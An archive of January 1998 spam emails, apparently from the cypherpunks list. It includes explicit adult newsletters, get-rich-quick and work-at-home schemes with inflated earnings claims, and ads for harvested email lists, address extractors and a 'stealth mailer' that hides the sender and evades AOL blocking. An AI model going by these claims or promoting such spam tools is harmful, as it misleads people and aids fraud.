		      713-524-3303 

		      Ask about our Web Page.
		      After 5PM this number is 
		      forwared to our voice mail.

TIE CLEANING-TIE CLEANING-TIE CLEANING-TIE CLEANING-TIE CLEANING- 
******************************************************************
******************************************************************
TO BE REMOVED FROM OUR MAILING LIST, TYPE: REMOVE-b@ix.netcom.com
in the (TO:) area and (REMOVE) in the subject area of a new E-mail 
and send.
******************************************************************
******************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eureka@eureka.abc-web.com
Date: Sat, 10 Jan 1998 03:13:56 -0800 (PST)
To: All Eureka! Subscribers: ;
Subject: Eureka! Fri Jan 9 '98
Message-ID: <19980110082909.5633.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to Friday's issue of Eureka!

KARA'S ADULT PLAYGROUND
With 15 live sex shows, 1,300 Hardcore XXX videos, 1,000s of
Hardcore  and Softcore  Pix,  the  VaVoom  monthly magazine,
Kara's  exclusive monthly centrefolds,  adult games,  erotic
stories  and even casino  and sports  betting,  you won't be
going out for weeks particularly now that you can get a FREE
trial - your eyes will be popping out of your head!  Hahaha!
Kara's Playground ...... http://www.rjbtelcom.com/eplay.html

GAYEUREKA!
The gay  newsletter is now  available.  You can get it here!
Gay Eureka! ........... http://eureka.abc-web.com/gayeureka/

EUREKA! TRANSLATIONS
As well as English you can now choose any of these languages
DEUTSCH ....... http://eureka.abc-web.com/eureka/deutsch.htm
ESPAOL ....... http://eureka.abc-web.com/eureka/espanol.htm
FRANAIS ..... http://eureka.abc-web.com/eureka/francais.htm
ITALIANO ..... http://eureka.abc-web.com/eureka/italiano.htm
PORTUGUESE . http://eureka.abc-web.com/eureka/portuguese.htm

PLEASE VISIT THIS FINE EUREKA! PARTNER SITE
Hot XXX Daily Top 100 FREE Picture Sites
http://www.6sites.inter.net/top100/
The Web's Hottest 100 FREE Picture Sites. Plus 5 FREE Pix
Every Day. Plus 12 FREE Video Sex Feeds. And 30+ Sample Pix.

INFINITE PLEASURES
This site is  loaded with lots of free pix to say the least!
All of the categories are  plainly listed for fast  surfing.
Bingo!  They also have some great free videos! Lots of bush!
Infinite Pleasures ...... http://www.infinite-pleasures.com/

INNOCENCE LOST
"Two beautiful women whom have  agreed to "lose" their inno-
cence in the presence of our cameras.." Here we have two hot
young ladies doing a nice  little romp on a daybed.  The pix
are high  resolution, so you can see it all.  They start out
slow but then it gets going with a mutual hooter connection!
Innocence ....... http://www.firstsightimages.com/innocence/

FREE SNATCH
Hey, I guess the price is right. At this site they have well
laid out pix.  These include, anal,  blowjobs, cumshots, hot
sluts, group sex, lesbians and fucking.  Not a bad mix here!
Free Snatch ..................... http://www.freesnatch.com/

PORN CENTRAL
Way down at the bottom of the main frame you'll find lots of
free pix.  These are some good ones.  One features two babes
pouring honey on each other. Sweet and stick nipples, Yummy!
Porn Central ................... http://www.porncentral.com/

FREE CONTEST!
If you  haven't won free 3 month  membership to HardCoreSmut
yet,  today is your  last chance.  If the competition is too
tough, then just give them your money, once you're a member,
your  accountant will be the last thing on your mind.  Visit
Hardcoresmut  and click on  "Free Guided Tour" for the tour.
Email the answer (found in Hardcore Games) to this question:
"These hardcore games are the ultimate in what?"............
Send answers to ............. mailto:contest@www.usachat.com
HardCoreSmut ................... http://www.hardcoresmut.com

FREE STREAMING VIDEO
Please note that most of these feeds require a Netscape bro-
wser in order to successfully view them. Unfortunately Micr-
osoft's browser does not have all the features of Netscape's
yet.  However, many of the feeds use the RealPlayer and will
work in most browsers.  If you do not have Netscape and want
a free copy click here ... http://www.netscape.com/download/
Just 18 ........................ http://204.244.215.7/teens/

CHAT WITH OTHER READERS
This chat is growing fast, and already there are a number of
regulars  you will meet most days.  It's good to see Eureka!
readers interacting with each other and having a great time!
Adult/Sex Chat .................. http://137.39.63.229/chat/
General/Fun Chat ........ http://137.39.63.229/chat/funchat/

THE BEST PHONE SEX
NEW!!!! LD Call only! - Live Hot Girls!!!!....1-664-410-3912
LIVE: 1-on-1, 2-on-1, Group, Dateline.........1-800-644-8779
FREE: Live 1-on-1 (international call only)....011-678-77416

AMATEUR SITE OF THE DAY
JAMIE WYLDE: A 36 year old Canadian amateur who has the body
of a goddess! She loves lingerie - and that is good news for
you, because she looks oohh so good in it. She loves to work
out and it shows.  Jamie could definitely keep you warm dur-
ing the cold winter!
............................ http://amateurindex.com/eureka/

EROTIC STORY SITE OF THE DAY
Planet Mojo: Mojo  brings  you  the  juiciest erotic stories
weekly! Every  week  all  new  exciting  erotic  stories are
posted for your pleasure. Visit Mojo today! ................
................................. http://www.planetmojo.com/

DAILY CARTOON ........... http://www.erosinorbit.com/eureka/

ADULT STAR PIC OF THE DAY
Every day  we bring you an exclusive  choice pic of a famous
adult porn star.  And we must tell you - these pix are abso-
luletly brilliant! .... http://www.xxxadultstars.com/eureka/

TODAY'S FREE PIX
Pic  1 ........................... http://137.39.63.229/?090
Pic  2 ........................... http://137.39.63.229/?091
Pic  3 ........................... http://137.39.63.229/?092
Pic  4 ........................... http://137.39.63.229/?093
Pic  5 ........................... http://137.39.63.229/?094
Pic  6 ........................... http://137.39.63.229/?095
Pic  7 ........................... http://137.39.63.229/?096
Pic  8 ........................... http://137.39.63.229/?097
Pic  9 ........................... http://137.39.63.229/?098
Pic 10 ........................... http://137.39.63.229/?099

===========================================================
TO UNSUBSCRIBE FROM THIS NEWSLETTER, USE THE REPLY FUNCTION
IN YOUR EMAIL PROGRAM, AND SEND THIS NEWSLETTER BACK TO US.
===========================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wopeunua84@toyoma-u.ac.jp
Date: Sat, 10 Jan 1998 10:52:33 -0800 (PST)
To: wopeunua84@toyoma-u.ac.jp
Subject: XXX ADULT SEX!!!
Message-ID: <199801104296VAA10778@post.121.47.225>
MIME-Version: 1.0
Content-Type: text/plain


Your Connection to Hot Sexy XXX Live Girls!!!

*LIVE GIRL SEX SHOWS!!!
* 10 FREE Live Video Feeds & Chatrooms!!! 
*FREE Erotic Stories!!
*1,000's of Free Pictures of XXX Porn Stars!!
*Confessions!!!
*Plus Free Pictures of Teens & Men!!!
*Live Erotic Chat!!!
*Gambling
* Tons of free stuff!!!
So Much More we can't fit it on this page. See for yourself, go check it out!!!

You must be 21 or older.

Copy & Paste the link below into your browser, and press enter. It's that easy!!!


http://www.search.com/Infoseek/1,135,0,0200.html?
OLDQUERY=pussyclub+&QUERY=pussyclub+&COLL=11&START=10&OLDCOLL=WW


If you take offense to this email & wish to be taken off our list,
simply  e-mail us at: stanleyo@hotmail.com
We are sorry for any 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 00000@hotmail.com
Date: Sat, 10 Jan 1998 22:55:28 -0800 (PST)
To: Everyone@the.net
Subject: Make $100 everytime the phone rings!!
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


    ==============================================
    "Internet Marketing Warriors Secret Site!"(tm)
            Copyright 1997 by Allen Says  
    ==============================================

       " I Never Made A Dime On The Internet "
                     ..UNTIL..

                I GOT MAD AS HELL !!

"After That, I've Made Money Every Day Since And I'll Show 
     You Exactly How To Get Started Doing What I Did!"


             The Start of the Warriors!!

 One night, after a long period of NO responses to all my 
ads, I compeletly flipped out! The months of hard work with
out any rewards had reached a boiling point and I decided to 
try direct e-mail marketing! 

I grabbed a pen and wrote the words...

            THE INTERNET MARKETING WARRIORS!

 I contacted a few select people who wanted to be dealers for 
my site and overnight we started taking in 10, 20, 30 and more 
orders a day! I had found the Power of Direct E-mail!!

 Why am I telling you this?

 Because the market is unlimited AND I can guarantee you if 
you will allow me to show you just a couple secrets about 
who is "really" making money on the net, that I can also get 
YOU to making money every day...starting immediately!!

 Join the Warriors today. And if I'm wrong, you have up to a
full year to get the small membership fee back. No risk, no
questions asked!

As a member of the Warriors Secret Site and Forum
you'll learn...

# How To Create Direct Response Web Sites that Make 
  People Buy - BEFORE They Leave! 

# How to Manipulate Search Engines and Get Hundreds 
  of Hits a Day in Less than a Week! POWERFUL!!!!! 
  (one of the BEST kept secrets) 

# How to Begin Selling Hot Information People Want 
  the 'Same Day' You Get My Report! I'll show you 
  where to get all the books you want - Hundreds 
  of them! 

# Fax-on-Demand Profits are Incredible - How to Turn 
  Other Peoples Fax Machines Into Your Own Personal 
  Printers and Create Huge, Constant Profits! 

# Secrets of Bulk E-Mail! Yes, it does work - BIG TIME! 
  But, there's ways to do it and never have a problem. 
  Never lose your Internet Service and Still Make Big 
  Money Every Day! 

# How to Make $1,000's Every Week With Low Cost 
  Classified's In Weekly Newspapers Across The United 
  States! Hidden sources let you get started Now! 

# How to collect all the e-mail addresses you want from 
  the Internet - For Free! Even have them delivered to 
  your e-mail address for nothing! 

# How to create a steady stream of buyers from 1000's of 
  newsgroups! 

# Exactly how to turn 1000's of prospects into Buyers 
  and Die-Hard, Loyal Customers For Life! It's so EASY! 
  (you'll LOVE this one) 

# Seduce the Mind and Activate the Emotions of Your 
  Prospects So They Buy NOW! Killer Strategies Used By 
  The Masters of Direct Response! 

# Powerful Secrets to Multiply Yourself Over the Web 
  and Lead 1000's of People to Your Site Every Day! If 
  You Can't Make Money With This You Might Be In Trouble! 
  ...It's NOT MLM! 

    And that's just what's in the Special Report!!

Check out the Software, E-mail Addresses, Special Reports 
and Books-on-Disk I have collected over the last 3 years
that are also Inside the Warrior's Secret Site!
               	
# Over 500,000 Email addresses You Can Download Right Now! 
  Thousands more being added every week!!

# 5 Different Email Address Extractors!...one extracts 
  addresses at 60,000 per hour!

# Free Web-Based Bulk E-Mailer - Awesome! Mail Your 
  Message At Rates Up to 250,000 An Hour!!

# How to use a Free Email Address Stripper on the secret site 
  to go onto aol and collect 1000's of 'targeted' email 
  addresses from the forums, message boards and member 
  directory!! Every day...FREE!!!

# A Copy of The Special Report: How To Make At Least Make 
  $1,600 a Week Online..Starting Now! 

# Learn the Secrets of BulkMail - How to Setup a Free Email 
  Extracting and Mailing System Using Freely Available 
  Programs!!

# 38 of the 'Hottest' Marketing Reports Ever Written!!

# 6 "Must Have" Books On Disk (the "forbidden" secrets and 
  strategies of getting 1000's of customers from the net!)

# Lifetime Subscription to the "Internet Marketing Warriors 
  Letter!"...Every New Issue Posted To The Secret Site....

 You Will Also Have Lifetime Access To The Warrior Forum
  Where You Will Find Your Every Question Answered And 
       Put Your Business Light Years Ahead Of The 
                     Competition!!

              "Inside The Warrior Forum"

# How To Accept Credit Cards For Your Business..NOW! You DO 
  NOT need a merchant account. Find THE Sources That Will 
  Get You Going Today!!

# Meta Tags - How to get top listings in search engines!

# In depth talks on getting around AOL blocking!! Warriors 
  get through when no one else can!!

# In depth reviews of all major bulk mailing & extracting 
  software - Netcontact, Floodgate, Stealth (all versions), 
  E-Mail Magnet, Extractor Pro and more - Find out the truth 
  BEFORE you buy!(Honest Reviews - Not by sellers - but by 
  actual buyers & users!)

# Access to one of our members bulk emailing support site...
  tons of free features, value and help!!

# Members who will submit your site to hundreds of search 
  engines for free...just because you are a Warrior!!

# Discover the secrets and power of CGI/PERL in bulk 
  mailing!!

# More Secrets about Autoresponders!!

# Killer Headlines & Sales Advice!!

# How to print your own money....legally!!

# Tricks to cut down on flames!! One dealer is making a ton 
  of money using this trick and gets very few flames!!

# Softsell vs. Hardsell....Which works best?

# Make Every Ad of Yours a Success!!

# Bulk Email Myth #1....

# Part 1: Copywriting Secrets! Part 2: Copywriting Secrets!

# Avoid this disaster when bulk mailing!!

# Sources for the latest bulk email accounts!!

# Some members are forming bulk e-mail co-ops and partner 
  groups right now!!

     Need to hear from other Warriors?

Allen, 
This is absolutely unbelievable. Within two days I 
have already made in excess of $200.00 and it only 
took about 2 hours to do every thing. The marketing 
reports that you supply are absolutely outstanding!!  
I have to say....my hat goes off to you. I am glad 
that there is someone out there who will give your 
moneys worth and a whole lot more!!
Thanks a Million,
J.R. (Florida)

Hi Allen,
Just a quick thank you note for creating the Warrior 
site. After a full two years of banging my head 
against the monitor screen, trying to make money on 
the internet, I finally have learned the secrets that 
I needed to make it all happen. Sponsoring people into 
my MLM program has never been easier and I don't worry 
anymore about losing my internet connection for sending 
bulk e-mail.  The contacts I have made in the forum 
have turned into pure gold and will continue to further 
educate me in the proper methods of internet marketing.  
Keep up the great work Allen!
Best Regards,
John Corbett
J&D Marketing

"I have been marketing online for a while now and I 
have more than tripled my former income working at my 
job (I have been fulltime in internet marketing for 
about 6 months now) and I only work around 15 to 20 
hours a week. During my time in this business I have 
been in contact with most of the major marketers online 
and I recommend Allen Says as the most honest and helpful 
individual I have dealt with in this business. His 
Marketing package is the best value on theinternet. 
Anyone who is thinking about doing any type of business 
on the web needs to be a member of the Internet Marketing 
Warriors."
Thank You, 
Terry Dean

Thanks for your kindness, and you can quote me on 
this: a veritable treasure-trove of money making 
ideas, the package has saved me hundreds of hours 
of research time. It is well worth joining! 
Regards,
Haider Aziz 

Allen -
This is the best $25 I ever spent. Thanks for the 
honesty & quality web site.
- Steve Traino

Allen
Joining the Internet Marketing Warrior family has 
been very rewarding to me. Prior to becoming a member, 
I wasted so much time on the net unsuccessfully 
finding the kind of information & internet marketing 
techniques that are available to me now as a Warrior 
member. In addition to all the money making information 
on the private site, what amazes me the most is the great 
contribution of information & help provided to everyone 
by top gun professional fellow Warrior members on the 
forum. I recommend this site to anyone serious about 
making money on the net.
Best of Success,
Alan Alvarez
President
South Pointe Financial Corp.

.."Started reading your report last night and..COULDN'T 
PUT IT DOWN! I got so caught up in it I didn't eat supper. 
It's jam-packed with over a dozen tried and true MONEY 
MAKING techniques! I also like the fact that you really 
care about your clients and are willing to talk and answer 
questions..refreshing in the vast world of cyberspace! If 
you Email Allen, he gets back with ya!" 
Sid Menough 
Florida 
-------
                  Join Us Today!
                       ***

         Only $24.95 For A Limited Time!!
               LIFETIME MEMBERSHIP!
       Full One Year Money-Back Guarantee!
                    Order Now!

The Complete Internet Marketing Warrior Package Is 
Availiable For Immediate Download At The Warrior's 
                  Private Site!

            Fast 24 Hour Ordering by 
      Direct Fax Order Line: 1-903-838-5534

     You'll Get Your Login Info The Same Day...
            Sometimes Within Minutes!

        ---------------------------------
         Warrior's Membership Order Form
        ---------------------------------

[]YES! Sign Me Up For Lifetime Access And Membership 
  To The Warriors Private Site For Only $24.95

[]I am paying by []Credit Card []Check []Money Order.
      (Please Make Payable To: Allen Says)

 Name:______________________________________

 Address:___________________________________

 City:______________________________________

 State:_________________Zip:________________

 Your Email Address:________________________
 
 Dealer Code#:  604

          --------------------------
          Visa\Mastercard Order Form
          --------------------------

 Name On Card:______________________________

 Credit Card#_______________________________

 Exp. Date:_________________________________
    (Charge Will Appear As "Info-World")


        Voice-Mail Order Line: 1-903-832-6067
NOTE: This is a line for leaving your credit card order
on our voice-mail system. Because my dealers bulk email
and a lot of people hate it, we don't answer this phone
"live" anymore.(no person could answer my phone and stay 
sane for very long :-) However, it is very safe to leave 
your Full Name, Credit Card #, The Expiration Date, Your 
Email Address and The Dealer Code#:  604 and I Will Get 
Back To You The Same Day With Your Access To The Site!!

 Speak Slowly and Take As Much Time As You Need!
    You'll Get Your Login Info The Same Day!!
          
     Direct Fax Order Line: 1-903-838-5534
       (Fax your order 24 hours a day!)

Order By Mail:

                 Allen Says
            1311 Old River Road
             Starks, La. 70661
=================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pkmrght487@aol.com
Date: Sat, 10 Jan 1998 22:56:56 -0800 (PST)
To: pkmrght090@aol.com
Subject: PRODIGIOUS NFL PICKS
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


<HTML><PRE><BODY BGCOLOR="#000000"><FONT COLOR="#00FFFF" SIZE=3>
     Hello SPORTSFANS!!!!  If you are an avid sportsfan like myself, then I 
know you will enjoy this ad.  Who are we?  We are Prodigious Picks and
Associates.  What are we?  We are one of the BEST sports handicapping
systems in the country.  Our predictions are decided  by a consensus 
analysis system that takes the predictions of SEVEN OF THE BEST
HANDICAPPERS IN THE COUNTRY!!!!  If you are one of the thousands 
of callers that has phoned us in the past weeks, we know that we have 
already proven ourselves to YOU.  If you have not had a chance to give 
us a call yet, we want to inform you that we went 19-6 by the line in the past
two weeks.  That is 76 PERCENT!!!  This includes winning 10 of 12 BIG PICKS
and going 6-2 in the NFL playoffs.  For this reason, we feel extremely confident
that we have the two winning picks for Sunday's championship games that
features DENVER at PITTSBURGH and GREEN BAY at SAN FRANCISCO. 
We are so sure of our predictions that we are calling them the TWO BIGGEST
PICKS OF THE YEAR!!!  Don't lose your money trying to pick the games 
yourself or by even calling some other handicapper whose price per call is 
much more expensive than ours.  Let us do the work and you get the MONEY!  
So give us a call after Friday and WE WILL DELIVER!!!!!!!!  

                                                   1-900-773-9777
                                                   Only $10 per call   
                                                  Must be 18 or older
P.S.   After you WIN 1000s on Sunday, give us a call on Monday for our
         winning basketball picks.  We will also have the winning SUPER
         BOWL PICK after January 22.
		       

                                         

 


</FONT><FONT  COLOR="#000000" SIZE=3>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: WebSoft Associates <websoft@websoftassoc.com>
Date: Sun, 11 Jan 1998 02:28:50 -0800 (PST)
To: WebSoft Associates <websoft@websoftassoc.com>
Subject: Congratulations!
Message-ID: <3.0.2.32.19980111020632.006e2f2c@websoftassoc.com>
MIME-Version: 1.0
Content-Type: text/plain


Dear Sir or Ms:
 
We at WebSoft Associates (http://www.websoftassoc.com) would like to
congratulate you on your recent selection by Inc. Magazine as
one of the 500 fastest growing private companies in the United States.
 
Being a small private company like yourself, we understand the need for
innovative and technically advanced business solutions.  We believe that we
can offer these solutions at a fair price and at an unmatched professional
level.  If you are committed to having an Internet presence, we are
committed to making that presence be as affordable, practical, and
professional as possible.
 
We are currently increasing both our customer base and the services that we
provide, as we strive to one day be included
in the Inc. 500.  We would like you to consider contacting WebSoft for any
of your future Internet and business technology needs, and help us meet
that goal.
 
Once again congratulations, and thank you for your time and consideration.
We will not send further email to your account unless you contact us first.
 
Sincerely,
 
Brian L. Cheek
President
WebSoft Associates
E-mail:  Websoft@websoftassoc.com
Website:  http://www.websoftassoc.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eureka@eureka.abc-web.com
Date: Sun, 11 Jan 1998 00:22:08 -0800 (PST)
To: All Eureka! Subscribers: ;
Subject: Eureka! Fri Jan 9 '98
Message-ID: <19980111081520.24717.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to Friday's issue of Eureka!

KARA'S ADULT PLAYGROUND
With 15 live sex shows, 1,300 Hardcore XXX videos, 1,000s of
Hardcore  and Softcore  Pix,  the  VaVoom  monthly magazine,
Kara's  exclusive monthly centrefolds,  adult games,  erotic
stories  and even casino  and sports  betting,  you won't be
going out for weeks particularly now that you can get a FREE
trial - your eyes will be popping out of your head!  Hahaha!
Kara's Playground ...... http://www.rjbtelcom.com/eplay.html

GAYEUREKA!
The gay  newsletter is now  available.  You can get it here!
Gay Eureka! ........... http://eureka.abc-web.com/gayeureka/

EUREKA! TRANSLATIONS
As well as English you can now choose any of these languages
DEUTSCH ....... http://eureka.abc-web.com/eureka/deutsch.htm
ESPAOL ....... http://eureka.abc-web.com/eureka/espanol.htm
FRANAIS ..... http://eureka.abc-web.com/eureka/francais.htm
ITALIANO ..... http://eureka.abc-web.com/eureka/italiano.htm
PORTUGUESE . http://eureka.abc-web.com/eureka/portuguese.htm

PLEASE VISIT THIS FINE EUREKA! PARTNER SITE
***THE BEST HARDCORE ON THE NET***
http://www.thehoneypot.com
We Offer You Only the Best In Harcore Adult Entertainment. 
Cheap Weekly Rates, Free Samples, And The Wettest Sluts
Anywhere.  Come See Why They Call It The Honey Pot.

INFINITE PLEASURES
This site is  loaded with lots of free pix to say the least!
All of the categories are  plainly listed for fast  surfing.
Bingo!  They also have some great free videos! Lots of bush!
Infinite Pleasures ...... http://www.infinite-pleasures.com/

INNOCENCE LOST
"Two beautiful women whom have  agreed to "lose" their inno-
cence in the presence of our cameras.." Here we have two hot
young ladies doing a nice  little romp on a daybed.  The pix
are high  resolution, so you can see it all.  They start out
slow but then it gets going with a mutual hooter connection!
Innocence ....... http://www.firstsightimages.com/innocence/

FREE SNATCH
Hey, I guess the price is right. At this site they have well
laid out pix.  These include, anal,  blowjobs, cumshots, hot
sluts, group sex, lesbians and fucking.  Not a bad mix here!
Free Snatch ..................... http://www.freesnatch.com/

PORN CENTRAL
Way down at the bottom of the main frame you'll find lots of
free pix.  These are some good ones.  One features two babes
pouring honey on each other. Sweet and stick nipples, Yummy!
Porn Central ................... http://www.porncentral.com/

FREE CONTEST!
If you  haven't won free 3 month  membership to HardCoreSmut
yet,  today is your  last chance.  If the competition is too
tough, then just give them your money, once you're a member,
your  accountant will be the last thing on your mind.  Visit
Hardcoresmut  and click on  "Free Guided Tour" for the tour.
Email the answer (found in Hardcore Games) to this question:
"These hardcore games are the ultimate in what?"............
Send answers to ............. mailto:contest@www.usachat.com
HardCoreSmut ................... http://www.hardcoresmut.com

FREE STREAMING VIDEO
Please note that most of these feeds require a Netscape bro-
wser in order to successfully view them. Unfortunately Micr-
osoft's browser does not have all the features of Netscape's
yet.  However, many of the feeds use the RealPlayer and will
work in most browsers.  If you do not have Netscape and want
a free copy click here ... http://www.netscape.com/download/
Just 18 ........................ http://204.244.215.7/teens/

CHAT WITH OTHER READERS
This chat is growing fast, and already there are a number of
regulars  you will meet most days.  It's good to see Eureka!
readers interacting with each other and having a great time!
Adult/Sex Chat .................. http://137.39.63.229/chat/
General/Fun Chat ........ http://137.39.63.229/chat/funchat/

THE BEST PHONE SEX
NEW!!!! LD Call only! - Live Hot Girls!!!!....1-664-410-3912
LIVE: 1-on-1, 2-on-1, Group, Dateline.........1-800-644-8779
FREE: Live 1-on-1 (international call only)....011-678-77416

AMATEUR SITE OF THE DAY
JAMIE WYLDE: A 36 year old Canadian amateur who has the body
of a goddess! She loves lingerie - and that is good news for
you, because she looks oohh so good in it. She loves to work
out and it shows.  Jamie could definitely keep you warm dur-
ing the cold winter!
............................ http://amateurindex.com/eureka/

EROTIC STORY SITE OF THE DAY
Planet Mojo: Mojo  brings  you  the  juiciest erotic stories
weekly! Every  week  all  new  exciting  erotic  stories are
posted for your pleasure. Visit Mojo today! ................
................................. http://www.planetmojo.com/

DAILY CARTOON ........... http://www.erosinorbit.com/eureka/

ADULT STAR PIC OF THE DAY
Every day  we bring you an exclusive  choice pic of a famous
adult porn star.  And we must tell you - these pix are abso-
luletly brilliant! .... http://www.xxxadultstars.com/eureka/

TODAY'S FREE PIX
Pic  1 ........................... http://137.39.63.229/?090
Pic  2 ........................... http://137.39.63.229/?091
Pic  3 ........................... http://137.39.63.229/?092
Pic  4 ........................... http://137.39.63.229/?093
Pic  5 ........................... http://137.39.63.229/?094
Pic  6 ........................... http://137.39.63.229/?095
Pic  7 ........................... http://137.39.63.229/?096
Pic  8 ........................... http://137.39.63.229/?097
Pic  9 ........................... http://137.39.63.229/?098
Pic 10 ........................... http://137.39.63.229/?099

===========================================================
TO UNSUBSCRIBE FROM THIS NEWSLETTER, USE THE REPLY FUNCTION
IN YOUR EMAIL PROGRAM, AND SEND THIS NEWSLETTER BACK TO US.
===========================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: steve@playgal.com
Date: Mon, 12 Jan 1998 02:11:27 -0800 (PST)
To: webmasters@playgal.com
Subject: Special Announcement from Intertain and Playgal
Message-ID: <199801111434.JAA10601@playgal.com>
MIME-Version: 1.0
Content-Type: text/plain


Both Richard from Intertain and I ( Dean from Playgal ) are pleased to
announce a strategic alliance between the Intertain and Playgal group of
businesses. This alliance will take the form of a partnership between the
two entities.

Intertain was one of the first ever ( arguably the first ) sites to charge
a monthly membership fee and has been around from the begining. Playgal
came into the industry this year. Both companies are multi million dollar
businesses with extensive asset backing and have a great deal of
resources.
We have a very solid track record of payment and integrity within the
adult industry.

Our first new joint venture under the partnership is the lateset mega site
UNFAITHFUL at http://www.unfaithful.com . We anticpate Unfaithful will be
more successful than our current group of sites.

To launch our new site we have put together a new click through program
"Unfaithful EasyCash" http://www.unfaithful.com/easycash which will give
webmasters the best of both worlds : - a high minimum payout guaranteed
and conversion rate bonuses over and above the minimum payout.

You will be guaranteed a minimum payout of 7.5 cents a unique hit ( not
unique visit ) - which means you will be paid 7.5 cents everytime an
individual person clicks on your banner each day. We are not filtering
hits - you get paid on unique hits to the front page - this should mean your
unique to raw ratio should be high.

You can earn conversion rate bonuses up to $5 per unique hit - with many
entry points along the way to ensure your revenue is maximized. 

You get paid by check or wire transfer every 2 weeks.

Goto http://www.unfaithful.com/easycash to see the full payout table.

We are offering:

* 3,000 live video feeds, hardcore streaming videos, QT/AVI and LIVE sex shows!
* Exclusive pictorial content updated each month!
* FREE MEMBERSHIP
* The highest quality "HARDCORE" pictures on the planet!

How easy is that to sell memberships ? The site and the EasyCash clickthrough 
has been designed to maximize revenue for both us and your banner partners.

If you have good quality traffic then this is the clickthrough that will
suit your site.

As part of our strategy we will be limiting the amount of traffic sent to
this site to avoid over saturation - so today is the day to sign up for
unfaithful at http://www.unfaithful.com/easycash while it is new and we
have available spaces. 

Judge for yourselves for today http://www.unfaithful.com is a top class
site.

Everyone should have an opportunity to increase revenue from their sites
by including Unfaithful.

Please direct all operational questions to steve@playgal.com as i am on my
way to IA2000.

Thanks for your time and have a prosperous new year.

Sign up now http://www.unfaithful.com/easycash

Regards


Dean
CEO
dean@unfaithful.com  or
thegeneral@playgal.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 93157112@ix.netcom.com
Date: Mon, 12 Jan 1998 13:14:14 -0800 (PST)
To: 75359351@ix.netcom.com
Subject: Email your AD to 57 MILLION People  ONLY $99
Message-ID: <269741324913.GAA23595@eieaaajj.com>
MIME-Version: 1.0
Content-Type: text/plain



        57 MILLION EMAILS FOR ONLY $99 
            INCLUDES STEALTH MAILER

  That's right, I have 57 Million  Fresh  email addresses that I will sell for only $99.   These are all fresh addresses that include almost every person on the internet today,  with no duplications.  They are all sorted and ready to be mailed.  That is the best deal anywhere today !  Imagine selling a product for only $5 and getting  only a 1/10% response.   That's  $2,850,000  in your pocket !!! Don't believe it? People are making that kind of money right now by doing the same thing, that is why you get so much email from people selling you their product....it works !  I will even tell you how to mail them with easy to follow step-by-step instruction I include with every order.  These 57 Million email addresses are yours to keep, so you can use them over and over and they come on 1 CD.  I will also include the stealth mailer - this is a full version of the incredibly fast mailing program that hides your email address when you send mail so no one
 will find out where it came from and you won't lose your dial up account. The stealth mailer  is an incredible program and absolutly FREE with your order !  If you are not making at least $50,000 a month, then ORDER NOW. 

ORDER NOW BY FAX:  Simply print out this order form and fax it to us along with  your check made payable to: Future WT  for only $99.  
Our Fax # is:  602 348 2955
We will confirm your order by email and then mail your cd out the same day via priority mail.

Name:_____________________________

Street Address:______________________________

City:_____________________       

State:________________ZipCode:_____________

Phone number:__________________________

Email:_______________________________
Tape your check here.  Returned checks are subject to $25 NSF Fee.
                Fax it to   602 348 2955
                                Or
You can mail a check or money order to:
FutureWT
15560 N. Frank Lloyd Wright  #b-4187
Scottsdale, AZ  85260

If you want to be removed from our mailing list just send a email here














57 million plus mailing program for only $99





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hethr@ntr.net
Date: Sun, 11 Jan 1998 15:31:14 -0800 (PST)
To: hethr@ntr.net
Subject: Hello, enjoy it..
Message-ID: <199801112329.SAA13169@rome.ntr.net>
MIME-Version: 1.0
Content-Type: text/plain



CHECKS PAID TO YOU UP-FRONT 6 DAYS A WEEK!

LEARN THE SECRET TO MAKING $1750.00 - $2175.00 
A WEEK SITTING AT YOUR HOME COMPUTER FOR 
JUST A COUPLE HOURS A DAY!   PART-TIME!

IN JUST 10 MINUTES WE'LL SHOW YOU AN EASY 
WAY TO MAKE MONEY WITH YOUR COMPUTER.

It's fun, it's rewarding, and it's easy.  This is so simple
most children could do it!  All you need is a computer and 
E-Mail address to begin making excellent money while 
relaxing in the comfort of your own home.  

All it takes is a couple hours a day and you can make
$1750.00 a week, or even $2175.00 (TWO THOUSAND 
ONE HUNDRED AND SEVENTY FIVE DOLLARS)  
There are people doing this every week.  Right now there 
are only a few people around the country who know how 
to do this.  And these few people are having the best time 
of their lives while their computers make them a high level 
of income.   

Even if you are happy with your current job, you can use 
this easy system in your spare time to create a nice extra 
income.  And let us assure you this system is completely 
legal.  We are so sure anyone can make a great extra 
income with this unique system, we will even let you try it 
out for 30 days!  And if you're not 100% satisfied, just send 
it back within 30 days and we will be more than happy to 
give you a full refund.  

Once you begin to see how easy it is to make money with 
your computer, you will wish you had received this letter a 
long time ago.  Anyone can do this, and since very little of 
your time is required, you will have more free time to spend 
doing the things you have always wanted to do.

So take the first step toward financial freedom and order 
this powerful money making system today!  You'll be glad 
you did!

This system has sold nationwide for as much as $29.95
And in 2 weeks we may be raising the price of our money 
making system.  Send in your order before then to be 
sure you receive it for only $14.95   

To receive your copy of our SIMPLE COMPUTER MONEY 
MAKING SYSTEM, along with a full 30 day money back 
guarantee, send a check or money order for $14.95 
payable to:

Crown Industries
1630 North Main St. Suite# 310
Walnut Creek,  CA  94596

Allow 4-6 days for delivery
(We do not accept orders from the state of Florida)

P.S.  We guarantee our "Computer Money Making
System" is the most complete and incredible money
making system for quick success you will ever use.
If you are not totally convinced that it's the greatest
work at home program anywhere, simply send it 
back for a fast hassle free refund.  

Due to the high response rate, we are not able to
answer questions or take orders by e-mail.   Please
direct all business to our postal address listed above.

Thank you,
Crown Industries










































From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 08145628@usa.net
Date: Sun, 11 Jan 1998 17:41:54 -0800 (PST)
